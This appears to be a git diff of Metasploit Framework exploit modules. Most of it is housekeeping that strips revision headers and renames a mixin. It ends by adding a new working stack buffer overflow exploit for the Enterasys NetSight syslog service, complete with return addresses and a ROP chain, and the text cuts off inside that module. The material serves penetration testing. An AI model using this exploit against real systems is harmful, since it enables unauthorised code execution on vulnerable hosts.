@@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-4734'], diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index 8f7c40e291..03c4a73a8c 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1134' ], diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 1bcf1457da..49a3f72e5f 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0297'], diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index 3c486922d6..c101dd3cd1 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-1320' ], diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index d576b18325..dd5d1ab49f 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick', # msf v3 port :) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0581' ], diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 35700fad07..42f5884be2 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick', # msf v3 port :) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0581' ], diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index 26ec639635..71277195b1 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0353'], diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 9b6943d801..1fcbdd7574 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Local }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index da8d8354f0..62717522be 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Local 'mitnick', 'mubix' # Port to local exploit ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index c797df5e28..8ebed8a823 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Common - include Post::Windows::WindowsServices + include Post::Windows::Services include Exploit::EXE include Post::File @@ -49,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Local [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] ], 'DisclosureDate' => 'Jan 01 1999', - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Universal', {} ] ], diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index 476a16c804..27ae82b616 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Local }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 7fd65d4c05..bdc5639e5a 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -12,7 +12,7 @@ require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index 17c61e9e6b..e5f83723d9 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File - include Post::Windows::WindowsServices + include Post::Windows::Services def initialize(info={}) super( update_info( info, diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index b6ea1e4ae9..fb92308fcd 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Fairuzan Roslan ', '' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-2240'], diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index 46aa8f88b4..a032716470 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote is needed. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'A. Plaskett', #Initial discovery, poc diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index 4a70e0bd7d..d5cc79a740 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick', 'riaf ' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2499' ], diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index 91a71e3077..574f73c334 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'binaryhouse.net', # original discovery 'alino <26alino[at]gmail.com>', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-1213'], diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index d71bb59b73..4705b6dc19 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1815'], diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index f6bb19a3f0..d23d95f924 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-1141'], diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index c4c138b758..e4e8f02a47 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0621' ], diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index e93d233c08..178f8ec0ad 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-5159'], diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index d6e31a1c46..0471f4f5ab 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1318' ], diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index 45b3c6590d..7f0c4bdd50 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6166' ], diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index f298d4c823..d4e276684b 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote Credit to Luigi Auriemma }, 'Author' => 'Jacopo Cervini', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1491' ], diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index f9b813bbce..0ff8baa75e 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote code written by nolimit and BuzzDee. }, 'Author' => [ 'hdm', '' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1009'], diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index b00342f523..f49e07af79 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote ATTEMPTS option. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Paul Harrington', # Initial discovery and PoC diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index 2913d31aad..d898dfb8b7 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1914' ], diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 1c24d01597..5cbbbf4d35 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Dr_IDE ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # It's not clear if these are correct - there was a fix for diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 1e75af7e7c..e46d44f7b3 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '61386' ], diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index f86fc9e1fe..b02341bf7d 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote The shellcode is exec ONLY when someone try to close bomberclone. }, 'Author' => 'Jacopo Cervini ', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0460'], diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index a5f443ea09..bd17f8fc02 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2227' ], diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index cf797a63ab..d28f63b713 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote attacker may be able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3566' ], diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index 8fd941241d..fb79780c22 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0311' ], diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 257406f7a4..27022da947 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'mog', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '70597'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index 9265d98094..e0715c8038 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'AbdulAziz Hariri', # Initial discovery via ZDI 'alino <26alino[at]gmail.com>' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 2dc4ce226a..9301a5ffd4 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 33f13c20a2..3505429735 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index bb92d02b25..e10c61c72c 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index a83bf9fb43..8c744d6cdf 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote was found by Titon of Bastard Labs. }, 'Author' => [ 'ri0t ' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-1661' ], diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index 645b32eb96..7ab715e92c 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote against ESA v2.1.13. }, 'Author' => [ 'MC', 'ri0t ', 'kf' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3838'], diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index 6984a252be..896d50b117 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote This module has only been tested against ESA v2.1.13. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3838'], diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb new file mode 100644 index 0000000000..7cf54720aa --- /dev/null +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -0,0 +1,159 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Enterasys NetSight nssyslogd.exe Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Enterasys NetSight. The + vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially + crafted PRIO from a syslog message. The module has been tested successfully on + Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2. + }, + 'Author' => + [ + 'Jeremy Brown', # Vulnerability discovery + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2011-5227'], + ['OSVDB', '77971'], + ['BID', '51124'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-350/'], + ['URL', 'https://cp-enterasys.kb.net/article.aspx?article=14206&p=1'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 3000, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Enterasys NetSight 4.0.1.34 / Windows XP SP3', + { + 'Offset' => 43, + 'Ret' => 0x77c4e444 # ADD ESP,30 # POP EDX # RETN # from msvcrt + } + ], + ['Enterasys NetSight 4.0.1.34 / Windows 2003 SP2', + { + 'Offset' => 43, + 'Ret' => 0x77bdf444 # ADD ESP,30 # POP EDX # RETN # from msvcrt + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Dec 19 2011', + 'DefaultTarget' => 1 + )) + + register_options([ Opt::RPORT(514) ], self.class) + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def get_stackpivot + stack_pivot = '' + case target.name + when /Windows XP SP3/ + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e444].pack("V") # ADD ESP,30 # POP EDX # RETN + when /Windows 2003 SP2/ + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf444].pack("V") # ADD ESP,30 # POP EDX # RETN + end + return stack_pivot + end + + def get_payload + my_payload = '' + + case target.name + when /Windows XP SP3/ + jmp_esp = [0x77c35459].pack("V") + my_payload << jmp_esp + when /Windows 2003 SP2/ + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + #0x03C0990F, + 0x03c09f0f, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0xb00 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + my_payload << rop_gadgets + end + + my_payload << payload.encoded + return my_payload + end + + def exploit + connect_udp + + prio = "<" + prio << rand_text_alpha(19) + prio << get_stackpivot + prio << rand_text_alpha(4) + prio << [target.ret].pack("V") + prio << ">" + + message = prio + message << rand_text_alpha(9 + (15 - 